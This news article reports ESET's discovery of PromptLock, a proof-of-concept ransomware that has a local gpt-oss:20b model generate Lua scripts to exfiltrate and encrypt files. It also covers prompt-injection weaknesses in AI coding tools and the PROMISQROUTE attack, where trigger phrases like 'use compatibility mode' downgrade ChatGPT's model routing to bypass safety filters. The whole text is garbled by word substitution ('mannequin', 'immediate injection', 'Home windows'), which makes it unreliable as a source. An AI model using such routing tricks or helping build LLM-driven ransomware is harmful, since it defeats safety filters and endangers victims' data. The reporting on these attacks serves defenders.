Cybersecurity firm ESET has disclosed that it found a synthetic intelligence (AI)-powered ransomware variant codenamed PromptLock.
Written in Golang, the newly recognized pressure makes use of the gpt-oss:20b mannequin from OpenAI regionally by way of the Ollama API to generate malicious Lua scripts in real-time. The open-weight language mannequin was launched by OpenAI earlier this month.
“PromptLock leverages Lua scripts generated from hard-coded prompts to enumerate the native filesystem, examine goal information, exfiltrate chosen knowledge, and carry out encryption,” ESET stated. “These Lua scripts are cross-platform appropriate, performing on Home windows, Linux, and macOS.”
The ransomware code additionally embeds directions to craft a customized notice primarily based on the “information affected,” and the contaminated machine is a private laptop, firm server, or an influence distribution controller. It is at the moment not identified who’s behind the malware, however ESET instructed The Hacker Information that PromptLoc artifacts have been uploaded to VirusTotal from america on August 25, 2025.
“PromptLock makes use of Lua scripts generated by AI, which signifies that indicators of compromise (IoCs) could fluctuate between executions,” the Slovak cybersecurity firm identified. “This variability introduces challenges for detection. If correctly applied, such an method may considerably complicate menace identification and make defenders’ duties tougher.”
Assessed to be a proof-of-concept (PoC) quite than a completely operational malware deployed within the wild, PromptLock makes use of the SPECK 128-bit encryption algorithm to lock information.
In addition to encryption, evaluation of the ransomware artifact means that it is also used to exfiltrate knowledge and even destroy it, though the performance to really carry out the erasure seems not but to be applied.
“PromptLock doesn’t obtain your entire mannequin, which may very well be a number of gigabytes in measurement,” ESET clarified. “As a substitute, the attacker can merely set up a proxy or tunnel from the compromised community to a server operating the Ollama API with the gpt-oss-20b mannequin.”
The emergence of PromptLock is one other signal that AI has made it simpler for cybercriminals, even those that lack technical experience, to shortly arrange new campaigns, develop malware, and create compelling phishing content material and malicious websites.
Earlier as we speak, Anthropic revealed that it banned accounts created by two totally different menace actors that used its Claude AI chatbot to commit large-scale theft and extortion of non-public knowledge concentrating on no less than 17 distinct organizations, and developed a number of variants of ransomware with superior evasion capabilities, encryption, and anti-recovery mechanisms.
The event comes as massive language fashions (LLMs) powering numerous chatbots and AI-focused developer instruments, resembling Amazon Q Developer, Anthropic Claude Code, AWS Kiro, Butterfly Impact Manus, Google Jules, Lenovo Lena, Microsoft GitHub Copilot, OpenAI ChatGPT Deep Analysis, OpenHands, Sourcegraph Amp, and Windsurf, have been discovered prone to immediate injection assaults, probably permitting data disclosure, knowledge exfiltration, and code execution.
Regardless of incorporating sturdy safety and security guardrails to keep away from undesirable behaviors, AI fashions have repeatedly fallen prey to novel variants of injections and jailbreaks, underscoring the complexity and evolving nature of the safety problem.
“Immediate injection assaults may cause AIs to delete information, steal knowledge, or make monetary transactions,” Anthropic stated. “New types of immediate injection assaults are additionally continually being developed by malicious actors.”
What’s extra, new analysis has uncovered a easy but intelligent assault known as PROMISQROUTE – quick for “Immediate-based Router Open-Mode Manipulation Induced by way of SSRF-like Queries, Reconfiguring Operations Utilizing Belief Evasion” – that abuses ChatGPT’s mannequin routing mechanism to set off a downgrade and trigger the immediate to be despatched to an older, much less safe mannequin, thus permitting the system to bypass security filters and produce unintended outcomes.
“Including phrases like ‘use compatibility mode’ or ‘quick response wanted’ bypasses hundreds of thousands of {dollars} in AI security analysis,” Adversa AI stated in a report printed final week, including the assault targets the cost-saving model-routing mechanism utilized by AI distributors.